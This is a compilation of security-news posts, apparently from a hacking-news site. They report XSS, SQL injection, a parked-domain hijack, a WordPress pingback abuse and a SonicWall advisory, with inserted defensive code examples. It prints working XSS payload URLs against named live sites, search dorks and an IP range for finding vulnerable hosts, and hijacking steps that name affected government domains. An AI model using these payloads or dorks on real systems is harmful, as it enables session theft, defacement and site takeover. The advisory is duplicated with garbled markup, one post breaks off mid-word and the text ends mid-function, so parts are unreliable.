Recently, we reported a reflected cross-site scripting vulnerability in the HostGator India hosting site that affects millions of hosted sites. Today, another Indian security researcher, Ramneek Sidhu, comes with another interesting find.
Ramneek Sidhu has discovered a reflected XSS vulnerability in one of the biggest web hosting sites, HostMonster (hostmonster.com). Just as in the previous case, this vulnerability affects all sites hosted on HostMonster.
The vulnerability was discovered in a subdomain of HostMonster. PoC:
http://host104.hostmonster.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />

The vulnerability was reported to Aarshit Mittal by the researcher. Aarshit started analyzing it and found a few more interesting things: he discovered that every website hosted on HostMonster is vulnerable to reflected XSS.
To find the list of sites hosted on HostMonster, search for "ip:74.220.207.104" in Bing. This single IP search gives 36,000 results, and all of those sites are affected by this security flaw. For instance, take "vividhbharti.com".
The PoC for this site is:
http://vividhbharti.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />

At EHN, I analyzed the affected sites to find out what causes this security flaw. It seems the flaw is introduced when the developer tries to display ads on the 404 Not Found page.
There is a JavaScript snippet that generates the ads. Interestingly, the code uses the referrer, which here is the current page address. Unfortunately, the developers fail to sanitize that URL before writing it into the page, which results in reflected XSS.
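The pattern described above, as an added example that is not the hosting provider's ad script and not code from the original article: a helper that builds ad markup from the page URL the way an unsanitized 404-page ad loader would, beside a hardened version, both runnable under Node. The page URL is passed in as a string (standing in for document.URL or document.referrer, which a browser script would read); the ad server URL and the PoC URL are constructed for the demo.

```javascript
// Added example (not the hosting provider's ad script). Shows why echoing the
// current URL into ad markup without encoding is a reflected XSS, and the fix.

// Vulnerable pattern, reconstructed from the article's description: the page
// URL is concatenated straight into HTML that an ad loader would hand to
// document.write(). A URL such as  http://host/"><SCRIPT>...</SCRIPT>  closes
// the src attribute and the tag, and the remainder is parsed as new markup.
function buildAdMarkupUnsafe(pageUrl) {
  return '<iframe src="https://ads.example/serve?ref=' + pageUrl + '"></iframe>';
}

// Encoder for the HTML text/attribute context: the five characters that can
// change the parser's state.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened version: encode for each context the value passes through, inner
// context first. The value becomes a query-string component (percent-encode),
// and that string then sits inside an HTML attribute (HTML-encode).
function buildAdMarkupSafe(pageUrl) {
  const ref = escapeHtml(encodeURIComponent(pageUrl));
  return '<iframe src="https://ads.example/serve?ref=' + ref + '"></iframe>';
}

// Demo check: does the produced markup contain a script tag the template
// never wrote itself?
function injectedScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker URL in the shape of the PoCs quoted in the article
// (assumed hostname).
const POC_URL = 'http://host.example/"><SCRIPT>alert(document.cookie)</SCRIPT>';

// Returns both renderings so the difference can be inspected side by side.
function demo() {
  return {
    unsafe: buildAdMarkupUnsafe(POC_URL),
    safe: buildAdMarkupSafe(POC_URL),
  };
}
```

The order of the two encodings matters: percent-encoding alone would still leave `&` and quotes that happen to survive into the attribute, and HTML-encoding alone would leave the query string unparseable by the ad server. Encoding inner context first and outer context second is what makes the value inert in both.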
HostGator, one of the leading web hosting providers, was found to be vulnerable to non-persistent (reflected) cross-site scripting. The vulnerability was discovered by Indian security researcher Manjot Gill. The finding was initially published on my friend Aarshit Mittal's security news portal, Cyber-N.
Manjot discovered the vulnerability in a subdomain of HostGator. He also claimed that a lot of sites hosted on HostGator are vulnerable too.
PoC for the subdomain XSS:
http://www.cluster2.hostgator.co.in/"><script>alert("HACKED BY ICH ")</script>

Aarshit Mittal analyzed the finding and discovered a few more interesting things.
Search for "site:.hostgator.co.in" and you will get more than 64,600 results. All of those subdomains are affected by this vulnerability. For example, take the first site from the results, "chahat.hostgator.co.in". It is affected by the XSS.
PoC:
chahat.hostgator.co.in/"><script>alert(document.cookie)</script>

You can also find the list of hosted sites by searching for the IP dork in Bing. For instance, searching for "ip:119.18.48.78" in Bing returns the list of affected sites.
You can find the rest of the vulnerable sites by varying the IP from "119.18.48.12" to "119.18.48.86".
The main domain is also affected by this vulnerability:
http://www.hostgator.co.in/"><script>alert(document.cookie)</script>
The affected sites are created and hosted via IndiaGetOnline (www.indiagetonline.in). "Get India Business Online" is an initiative by Google that lets you create a website for your business in 15 minutes, for free; HostGator provides the hosting, its site-building tool, and support.
All the sites created with HostGator's site-building tool are affected, because the main site-building site (hostgator.co.in) is itself affected by this security flaw.
Security researcher Frans Rosén has discovered cross-site scripting vulnerabilities in Facebook and Dropbox.
Initially, the researcher was looking for security flaws in Dropbox. He noticed that when using the web interface there were some restrictions on which filenames were allowed. He tried to rename a file to '"><img src=x onerror=alert(document.domain)>.txt but got an error message that some special characters are not allowed.
"But, if you instead connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems," the researcher explained in his blog. "Using this method I was able to find two issues with their notification messages showing unescaped filenames."
He notified Dropbox about the vulnerability and they have since patched the flaw.
After some time, he noticed that there is a connection between Dropbox and Facebook: you can add files directly from Dropbox to your Facebook groups. So he was curious to test the vulnerability in Facebook as well.
In his Facebook group, he tried to add the file previously uploaded to Dropbox. After he posted it in the group, the XSS did not fire. But when he clicked the 'Share' link on the post, he got the alert: he had managed to run the script in Facebook. The XSS also worked when he shared a crafted pin from Pinterest.
The researcher received a $3,500 USD bug bounty for reporting the vulnerability; Facebook has now fixed it.
Jason A. Donenfeld has discovered a critical vulnerability in the popular WordPress plugin "W3 Total Cache". The plugin improves the user experience of a site by improving server performance, caching every aspect of the site.
The cache data is stored in a publicly accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.
A simple Google search for "inurl:wp-content/plugins/w3tc/dbcache" returns a list of WordPress sites affected by this vulnerability.
According to Jason, the cache files are publicly downloadable by default, and the key values / file names of the database cache items are easily predictable, even with directory listing turned off.
He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh
WordPress users are advised either to upgrade the plugin to the new version or to deny access to the plugin's cache directory with an extra .htaccess file in that folder.
Last month, we learned that hackers hijacked Google Pakistan and other sites by modifying DNS records. The records were changed to point at a Freehostia site where the attackers hosted the defacement page.
Now, Indian security researcher Aarshit Mittal has come up with an interesting find: he has discovered a critical domain hijacking vulnerability in popular free web hosting providers. The vulnerability allows attackers to take control of websites hosted there.
Aarshit demonstrated how to exploit the vulnerability on his blog. The attacker needs to create an account with the target web hosting provider; he explained the vulnerability using 000webhost.com.
Once the account is created, log in to the cPanel, where you can see the shared IP address. Searching for that IP address with some keywords in Bing returns the sites hosted on that specific IP.
Interestingly, Aarshit managed to find government sites (csirt.gov.bd) hosted on 000webhost.
After discovering the list of hosted sites, the attacker can add those domain names as 'parked domains' in cPanel. cPanel allowed him to add the domain names without any ownership check.
Now the attacker only needs to upload a defacement page to his hosting account, and the defacement appears on the victim site: the victim's domain already resolves to the shared IP, so the web server now serves the attacker's files for that hostname. The attacker can also create many subdomains under the hijacked domains.
By exploiting this security flaw, the researcher successfully hijacked the following domains:
- test.fraymamertoesquiu.gov.ar
- test.concejodeitagui.gov.co
- dns.hviota.gov.co
- test.digitizeyou.in
- men.csirt.gov.bd
- bd.csirt.gov.bd
Affected hosting providers:
- www.freehostia.com/
- www.freewebhostingarea.com/
- x10hosting.com/
- www.110mb.com/
These are not the only ones; plenty of other free hosting servers are affected by this vulnerability.
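The parked-domain hijack described above, as an added example that is not 000webhost's or cPanel's code: a model of a shared server's virtual-host table, with the unchecked park operation the article describes beside one that checks account binding and DNS-based proof of control. Hostnames, paths, the shared IP and the TXT-record scheme are assumed for the demo, and DNS lookups are replaced by a constructed table.

```javascript
// Added example, not 000webhost's or cPanel's code. Models why "parked
// domains" on a shared IP become a site hijack, and a check that stops it.

const SHARED_IP = '203.0.113.10'; // constructed shared hosting IP (assumed)

// Constructed stand-in for DNS: the victim's zone already points at the
// shared IP (that is why an ip: search finds it). The attacker controls only
// attacker.example and has published a verification token there.
const FAKE_DNS = {
  'victim.example':   { A: [SHARED_IP], TXT: [] },
  'attacker.example': { A: [SHARED_IP], TXT: ['hosting-verify=tok-att-1'] },
};
function resolve(name, type) {
  const rec = FAKE_DNS[name];
  return rec ? rec[type] : [];
}

// Virtual-host table the web server consults per request: it picks the
// document root by the Host header, not by who owns the DNS zone.
function newVhostTable() {
  return new Map([
    ['victim.example', { account: 'victim', docroot: '/home/victim/public_html' }],
  ]);
}
function docrootFor(vhosts, host) {
  const v = vhosts.get(host);
  return v ? v.docroot : '/var/www/default';
}

// Behaviour the article describes: the panel accepts any hostname the user
// types. Because victim.example already resolves here, every request for it
// is now served from the attacker's directory. No DNS change is needed.
function parkDomainUnchecked(vhosts, account, domain) {
  vhosts.set(domain, { account, docroot: `/home/${account}/public_html` });
  return { ok: true };
}

// Hardened version (assumed scheme). Two independent checks:
//  1. a hostname already bound to another account on this server is refused;
//  2. the requester must prove control of the zone with a TXT record
//     carrying a token issued for their account.
function parkDomainVerified(vhosts, account, domain, token) {
  const existing = vhosts.get(domain);
  if (existing && existing.account !== account) {
    return { ok: false, reason: 'hostname already assigned to another account' };
  }
  if (!resolve(domain, 'TXT').includes(`hosting-verify=${token}`)) {
    return { ok: false, reason: 'ownership TXT record not found' };
  }
  vhosts.set(domain, { account, docroot: `/home/${account}/public_html` });
  return { ok: true };
}
```

Check 2 is the one that actually defeats the attack, since the attacker cannot publish records in the victim's zone; check 1 is cheap defence in depth that also catches a misconfigured record check. The same verification has to apply to subdomains added under a parked name, otherwise the subdomain route described above remains open.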
A pingback security bug in the WordPress blogging platform can be exploited to launch distributed denial-of-service (DDoS) attacks, according to web application security firm Acunetix.
The vulnerability is exploitable through the platform's XML-RPC API (xmlrpc.php).
A malicious hacker can spoof a pingback to a specific blog in order to guess hosts inside the network being targeted, port scan those hosts, reconfigure internal routers, or simply launch DDoS attacks.
The team implemented an Acunetix WVS script to test this security flaw. The script tries to resolve various common internal hostnames and connect to common ports, and at the end reports the successful attempts.
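The pingback abuse described above, as an added example that is not Acunetix's WVS script and not WordPress code: the shape of the XML-RPC pingback.ping call posted to xmlrpc.php, and a check a blog or WAF can run on the sourceURI before fetching it, refusing private, loopback and link-local addresses and non-standard ports. The hostnames and request bodies are constructed for the demo; the extractor handles only this method's two string parameters and is not a general XML-RPC parser.

```javascript
// Added example, not Acunetix's script nor WordPress code. Builds the
// pingback.ping request that reaches xmlrpc.php and screens its sourceURI
// before the blog would fetch it.

// Request body an attacker posts. sourceURI is the page the blog will fetch
// to verify the link; that server-side fetch is the primitive abused for
// internal host discovery, port scanning and DDoS. targetURI is any post on
// the victim blog. Hostnames below are constructed.
function buildPingbackRequest(sourceUri, targetUri) {
  return [
    '<?xml version="1.0"?>',
    '<methodCall><methodName>pingback.ping</methodName><params>',
    `<param><value><string>${sourceUri}</string></value></param>`,
    `<param><value><string>${targetUri}</string></value></param>`,
    '</params></methodCall>',
  ].join('');
}

// Pulls the two string parameters out of a pingback.ping call. Deliberately
// narrow: it is not a general XML-RPC parser.
function parsePingback(xml) {
  if (!/<methodName>\s*pingback\.ping\s*<\/methodName>/.test(xml)) return null;
  const strings = [...xml.matchAll(/<string>([^<]*)<\/string>/g)].map((m) => m[1]);
  if (strings.length < 2) return null;
  return { sourceUri: strings[0], targetUri: strings[1] };
}

// RFC 1918 ranges, loopback, link-local and the 0.0.0.0/8 "this network".
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 || (a === 169 && b === 254) ||
         (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Decision the server should make before issuing the outbound fetch.
function classifyPingback(xml) {
  const p = parsePingback(xml);
  if (!p) return { allow: false, reason: 'not a pingback.ping call' };
  let u;
  try {
    u = new URL(p.sourceUri);
  } catch (e) {
    return { allow: false, reason: 'unparseable sourceURI' };
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    return { allow: false, reason: `scheme ${u.protocol} not allowed` };
  }
  const host = u.hostname.replace(/^\[|\]$/g, '');
  if (host === 'localhost' || host === '::1' || isPrivateIPv4(host)) {
    return { allow: false, reason: `internal host ${host}` };
  }
  // URL leaves port empty when it is the scheme default, so 80/443 never appear.
  if (u.port !== '' && u.port !== '80' && u.port !== '443') {
    return { allow: false, reason: `non-standard port ${u.port}` };
  }
  return { allow: true, reason: 'ok' };
}
```

A literal-address check is only the first layer: a public hostname can resolve to an internal address, or change between check and fetch, so the resolved address should be screened again in the fetch path, and outbound rate limiting covers the DDoS case, which this filter cannot distinguish from legitimate pingbacks.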
Vulnerability-Lab researchers have found multiple persistent input validation web vulnerabilities in the Enterpriser16 v7.1 Load Balancer application.
The first set of vulnerabilities is located in the `Edit Configuration` module, in the Label, Virtual Host, Request to send, Email Alerts and Response expected parameters.
The second set is located in the Create Solution, Access points and New Contract modules, in the title, asset name, contract name, name and description parameters.
Exploitation requires low user interaction and a low-privileged application user account. Successful exploitation can lead to persistent session hijacking (manager/admin), persistent phishing or persistent manipulation of the module's web context.
A detailed proof-of-concept can be found here.

The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official PayPal (core) e-commerce website content management system.
The security flaw allows remote attackers to inject their own malicious script code on the application side (persistent).
The persistent input validation vulnerability is located in the Adressbuch (address book) module, in the search function, when script code tags stored as address book contacts are processed. The code is executed from the search result listing web context. Remote exploitation requires low user interaction and a privileged PayPal banking application user account.
Successful exploitation results in persistent session hijacking (admin), account theft via persistent phishing, or persistent manipulation of the search module's web context.
In an email sent to EHN, Vulnerability Laboratory submitted the proof-of-concept for the security flaw. You can find the PoC code here: http://pastebin.com/LhB82k4F
A contact name containing the code was saved in the address book. Only a matching, successful search result leads to the persistent execution of the code in the web context.
When another user searches for that existing address book entry, the code is executed persistently from the matching search result listing.
A few months after the vulnerability was reported to PayPal, the PayPal security team patched it on December 11.
Recently we reported that the Tumblr reblog attack was caused by a stored cross-site scripting (XSS) vulnerability. The vulnerability was discovered by security researcher Janne Ahlberg, who says it is not yet fixed.
According to his research, it is possible to embed JavaScript and some other HTML tags in certain Tumblr post types (e.g. video posts).
The vulnerability can be used to launch phishing attacks. For instance, it would be quite easy to ask for input from the user in various ways; that input could be stored on the attacker's server, and the attacker could push malicious files from his or her server to Tumblr users.
"Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts," the researcher wrote, describing one possible attack scenario.
"Once the 'attack blog' would have enough followers, attacker could create a malicious post again with carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start."
[Image: Boolean-based SQL injection vulnerability]
Recently, the news about the Google Pakistan hack spread like wildfire across the Internet. At the time, top-level Pakistani domains displayed the defacement page, including Yahoo, MSN, HSBC, eBay, PayPal and more.
Today, khanisgr8, a hacker from the Pakistani hacker collective "TeamBlackHats", sent an email regarding the security breach. He explains how those websites were hacked by the Turkish hacker group "EBoz".
The day before yesterday we mentioned that the hacked sites' DNS records pointed to a different free hosting site. We also reported that the sites might have been hacked via a PKNIC vulnerability.
PKNIC is responsible for the administration of the .PK domain name space, including the operation of the DNS root servers for .PK domains and the registration and maintenance of all .PK domain names. PKNIC is operated as a self-supporting organization.
The hackers claim to have discovered Boolean-based blind SQL injection, persistent cross-site scripting and sensitive directory disclosure vulnerabilities in the official website of PKNIC.
They provided us with the vulnerable link and a PoC to exploit it. They also sent some data compromised using the vulnerability, containing database details, usernames and hashed passwords.
[Image: XSS vulnerability]
He also provided a screenshot of the cross-site scripting vulnerability. When I tried to verify the XSS, I searched Google for the URL and visited a PKNIC link. On the page I saw the literal text "<script>alert("HACKED BY COde InjectOr")</script>", so perhaps the Code Injector team had also attempted to exploit the vulnerability.
"Apparently Google Pakistan has been defaced by a Turkish hacker group 'Eboz'. It's still quite hard to believe that Google server has been hacked. They really need to put a lot of focus on their defenses because if one website got hacked that means every other website can be hacked," they said.
We have sent an email to PKNIC regarding the vulnerability and are waiting for their response. As we are not sure whether the vulnerability is fixed, we are not providing the vulnerable link here.
Indian security researcher Shubham Upadhyay, online handle Cyb3R_Shubh4M, has discovered a persistent cross-site scripting vulnerability in the eBay site.
In an email sent to Xssed.com, the researcher explained the details of the vulnerability. To exploit it, an attacker needs a seller account. Once logged in to the seller account on eBay, the attacker creates a listing for sale in which he places the XSS exploit code.
At the time of writing, the vulnerability is unfixed. Here is the page where he injected his code:
http://www.ebay.com/itm/181023275832?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649
The mirror is available here:
http://www.xssed.com/mirror/79254/
According to the researcher, it also gets executed in the cgi.ebay.com domain when logged in the seller acco
A reflected cross-site scripting vulnerability has been found in Verizon by #Nullcrew.
The hacker tweeted the PoC for the vulnerability:

"http://games.verizon.com/landing/p/freeplay/instr.jsp?gameId=722050&gameTitle=%3Cscript%3Ealert%28%22Lulz.%22%29%3C/script%3E"

As usual, I tested whether the vulnerability lets an attacker redirect to another site by injecting the following code:
document.location="http://www.google.com"
It successfully redirected me to Google. This means an attacker can lure a user into clicking a crafted link and redirect them to any site he wants; the attacker can also hijack sessions and more.
An information disclosure 0-day vulnerability has been discovered in Novell ZENworks Asset Management 7.5 that allows a remote attacker to read any file with SYSTEM privileges and retrieve configuration parameters from ZENworks Asset Management.
ZENworks Asset Management provides a web console where the user can access the data collected about network devices and edit some information.
The web console is provided as a Java web application named rtrlet. Two HandleMaintenanceCalls operations, GetFile_Password and GetConfigInfo_Password, have hard-coded credentials. GetFile_Password allows access to any file on the filesystem, and GetConfigInfo_Password allows access to ZENworks Asset Management configuration parameters along with the back-end system's credentials.
The vulnerability was discovered by Rapid7 exploit developer Juan Vazquez, who wrote an exploit module for Metasploit. Metasploit notified both Novell and CERT, as per its disclosure policy.
US-CERT is not currently aware of a solution to the problem, but suggests a workaround: "Restrict Access: Appropriate firewall rules should be put in place so only trusted users can access the web interface."
Indian security researcher Girish Shrimali has discovered a cross-site scripting vulnerability in the official website of A. P. J. Abdul Kalam, the Indian scientist and administrator who served as the 11th President of India.
The discovered XSS is of the reflected type, i.e. non-persistent and exploited via a crafted URL.
Reflected XSS is normally considered low risk. Even so, attackers can use it to redirect users to phishing or other malicious sites.
PoC:
http://www.abdulkalam.com/kalam/jsp/display_hints.jsp?menuid=22&menuname=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E&starts=0&ends=0
A grey-hat hacker has discovered critical SQL injection and cross-site scripting vulnerabilities in the official website of the U.S. Navy (navy.mil).
"Recently I was pentesting one of navy.mil subdomains and found serious sql injection that allowed me to extract sensitive data from website database. Sql injection is located in post parameters of a form value. Attacker just needs to craft valid query and submit it to the server," the hacker wrote in an email.
[Image: SQLi vulnerability]
He also discovered two XSS vulnerabilities on the same subdomain, one via POST and the other via GET, both reflected.
"I have reported this to website security and I hope it will be resolved soon. After the fix I will disclose link locations on my blog http://m4x0n3.blogspot.com/," the hacker said.
"Never trust user input," the hacker said as a message to webmasters.
The Vulnerability Laboratory Research Team has discovered multiple web vulnerabilities in SonicWall's UTM Email Security v7.3.5.6379 & Virtual Appliance.
Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
Multiple persistent input validation vulnerabilities were detected in SonicWall's UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerabilities allow a remote attacker or a local low-privileged user account to inject malicious persistent script code on the application side of the email security appliance.
The vulnerabilities are located in the Compliance & Virus Protection Procedures modules, when unsanitized inputs are loaded into the output listing of a configuration. Vulnerable values are floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser, zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation results in session hijacking, persistent phishing requests & stable persistent manipulation of the module context.
Vulnerable Module(s):
[+] Virenschutzverfahren (Virus Protection Procedures)
[-] Ausgehend (Outgoing) - Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner (Approval Folder) > Add new Approval Folder
1.2
Multiple client-side cross-site scripting vulnerabilities were detected in SonicWall's UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerabilities allow a remote attacker to manipulate client-side appliance requests, with medium user interaction required.
Successful exploitation results in session hijacking, account theft, client-side phishing requests or manipulated context
execution in client-side requests. The vulnerabilities are located in the `from` & `row` page listing values. Successful exploitation
results in client-side session hijacking, non-persistent phishing requests & non-persistent manipulation of the module context.
Vulnerable Module(s):
[+] Listing Page (?from & ?row)
Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low-privileged user accounts.
For demonstration or reproduction ...
PoC: Ausgehend (Outgoing) - Listing & Exceptions
<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
<input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>
... or
<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">
... or
<input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">
... or
<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">
... or
<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">
URL: http://esserver.127.0.0.1:8080/virus_config.html
PoC: Compliance Module -> Approval Ordner (Approval Folder) - Listing & Exceptions
<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
align="right"><input type="button" name="delete" class="button"
value="Löschen"
URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html
1.2
The client-side cross-site scripting vulnerabilities can be exploited by remote attackers, with medium user interaction required.
For demonstration or reproduction ...
PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities is estimated as high(-).
1.2
The security risk of the client-side cross-site scripting vulnerabilities is estimated as low(+).
UPDATE: Patch
"Dell SonicWALL E-mail security customers: 7.3.6 patch is now available https://www.mysonicwall.com/Firmware/DownloadCenter.aspx"
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
PoC Video:
While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs.
Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script code on application side of the email security appliance application.
The vulnerabilities are located on the Compliance & Virus
protection procedures module when processing to load unsanitized inputs as output listing of a configuration. Vulnerable values are floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser,zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the vulnerability result in session hijacking,persistent phishing requests & stable persistent module context manipulation.
Vulnerable Module(s):
[+] Virenschutzverfahren
[-] Ausgehend (Outgoing) - Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner > Add new Approval Folder
1.2
Multiple client side cross site scripting vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance requests with medium required user inter action.
Successful exploitation results in sessio hijacking, account steal, client side phishing requests or manipulated context
exection on client side requests. The vulnerabilities are located on the `from`- & `row` page listing values. Successful exploitation
of the vulnerability result in client side session hijacking, non-persistent phishing requests & non-persistent module context manipulation.
Vulnerable Module(s):
[+] Listing Page (?from & ?row)
Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user accounts.
For demonstration or reproduce ...
PoC: Ausgehend (Outgoing) - Listing & Exceptions
<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
<input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>
... or
<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">
... or
amp;lt;input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">
... or
<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">
... or
<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">
URL: http://esserver.127.0.0.1:8080/virus_config.html
PoC: Compliance Module -> Approval Ordner - Listing & Exceptions
<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
align="right"><input type="button" name="delete" class="button"
value="Löschen"
URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html
1.2
The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user interaction.
For demonstration or to reproduce ...
PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
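The reflected PoCs above carry their angle brackets double percent-encoded (%253c becomes %3c after one decode and only becomes < after a second one), which is the classic way past a filter that inspects the once-decoded parameter. The following is an added example, not code from the advisory or from the SonicWALL product: a hypothetical listing renderer that decodes twice around a bracket blacklist, beside a hardened version that decodes exactly once, validates `from`/`row` as integers, and HTML-encodes at output. The payload strings and the filter are constructed for the demonstration.

```python
import html
import re
from urllib.parse import unquote

# Constructed query values modelled on the advisory's alert_history.html?from= PoC.
# In DOUBLE_ENCODED the angle brackets are percent-encoded twice (%253c -> %3c -> <).
SINGLE_ENCODED = "200%3ciframe%20src%3Da%20onload%3Dalert%28document.cookie%29%3e"
DOUBLE_ENCODED = "200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c"


def blacklist_filter(value: str) -> str:
    """Hypothetical input filter: drops literal angle brackets from the decoded value."""
    return value.replace("<", "").replace(">", "")


def render_listing_naive(raw_param: str) -> str:
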